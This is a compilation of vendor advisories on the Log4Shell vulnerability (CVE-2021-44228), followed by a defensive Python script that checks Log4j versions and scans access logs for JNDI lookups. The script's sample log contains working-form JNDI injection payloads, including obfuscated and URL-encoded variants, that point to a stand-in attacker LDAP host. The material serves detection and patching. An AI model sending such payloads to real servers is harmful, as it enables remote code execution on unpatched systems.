Here you can find a compilation of links from vendors with information about Log4J (CVE-2021-44228)
Axonius has provided some queries for finding software using Log4j: https://www.axonius.com/blog/tracking-log4shell-and-related-applications-with-axonius
The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled – this effectively blocks any further attempt to exploit Log4Shell on this server.
Link about the “vaccine”: https://github.com/Cybereason/Logout4Shell
Cybereason is aware of the vulnerability and has completed verification that this issue does not affect Cybereason products or services.
A remote code execution (RCE) vulnerability in Apache log4j2 was identified as being exploited in the wild. Public proof-of-concept (PoC) code was released, and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Because the discovery of this exploit is so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. As with many high-severity RCE exploits, massive scanning activity for CVE-2021-44228 has thus far begun on the internet with the intent of seeking out and exploiting unpatched systems. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.
Affected Version: Apache Log4j 2.x <= 2.15.0-rc1
See the Unit 42 threat brief for additional details on the attack, product updates, and courses of action.
BEST PRACTICE: Palo Alto Networks strongly recommends that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.
The Cortex XDR research team has investigated the above vulnerability, and we are happy to announce that the Cortex XDR Linux agent, running on version 7.0 and above, will block the known PoCs of CVE-2021-44228 that our research team investigated*.
To ensure you are receiving alerts and monitoring any exploitation attempts:
*Note that Alpine environments using musl instead of libc are not covered by the Java Deserialization Module; they have coverage of some post-exploitation techniques leveraging this exploit through Behavioral Threat Prevention. Scanning attempts will not be prevented, only a full exploit chain. Hosts with SELinux enabled or in permissive mode do not have the Java Deserialization Module and are not protected.
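The two defender-side checks the advisories above boil down to are a version comparison against the affected range stated on this page (Apache Log4j 2.x <= 2.15.0-rc1) and a scan of web-server access logs for the JNDI lookup string that the crafted requests carry. The following is an added example, not code from any of the vendors listed here; the sample access-log lines, the 203.0.113.10 address and the function names are constructed for illustration.

```python
"""Triage helpers for CVE-2021-44228: version check and access-log scan (added example)."""
import re
from urllib.parse import unquote

# Affected range as stated on this page: Apache Log4j 2.x <= 2.15.0-rc1
AFFECTED_UPPER_BOUND = "2.15.0-rc1"

# Accepts "2.14.1", "2.15.0-rc1", "2.0"; other pre-release labels raise ValueError.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?$", re.IGNORECASE)


def version_key(version: str):
    """Turn '2.15.0-rc1' into a sortable tuple.

    A release candidate sorts before the final release of the same number:
    rc1 -> (..., 0, 1), final -> (..., 1, 0).
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, rc = m.groups()
    pre = (0, int(rc)) if rc is not None else (1, 0)
    return (int(major), int(minor), int(patch or 0)) + pre


def is_affected(version: str) -> bool:
    """True when a Log4j 2.x version lies inside the page's affected range."""
    key = version_key(version)
    return key[0] == 2 and key <= version_key(AFFECTED_UPPER_BOUND)


# --- access-log scan ---------------------------------------------------------
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# ${lower:x}, ${upper:x} and ${anything:-x} all resolve to x inside a lookup,
# so collapse them before matching.
_INNER_LOOKUP_RE = re.compile(
    r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*:-([^{}]*)\}", re.IGNORECASE
)


def normalize(text: str) -> str:
    """Undo URL encoding and collapse nested lookups to their plain form."""
    text = unquote(unquote(text))  # handles single and double encoding
    prev = None
    while prev != text:  # repeat until no nested lookup is left
        prev = text
        text = _INNER_LOOKUP_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def scan_log(lines):
    """Return (line_number, snippet) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI_RE.search(norm)
        if m:
            hits.append((n, norm[m.start():m.start() + 40]))
    return hits


# Constructed sample access-log lines (not real traffic); 203.0.113.10 is a
# documentation address standing in for an attacker-controlled LDAP server.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 880 "-" "${jndi:ldap://203.0.113.10/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 404 12 "-" "${${lower:j}ndi:ldap://203.0.113.10/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.4 - - [10/Dec/2021:10:00:05 +0000] "GET /static/app.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("2.14.1", "2.15.0-rc1", "2.15.0-rc2"):
        print(f"log4j {v}: {'AFFECTED' if is_affected(v) else 'not in affected range'}")
    for n, snippet in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup found: {snippet}")
```

The version check only encodes the range this page gives; it is a triage aid, not a substitute for the vendor's own advisory. The log scan flags lines for review and, as the Cortex XDR note above points out, seeing a lookup string in a log proves a scanning attempt, not that the exploit chain succeeded on that host.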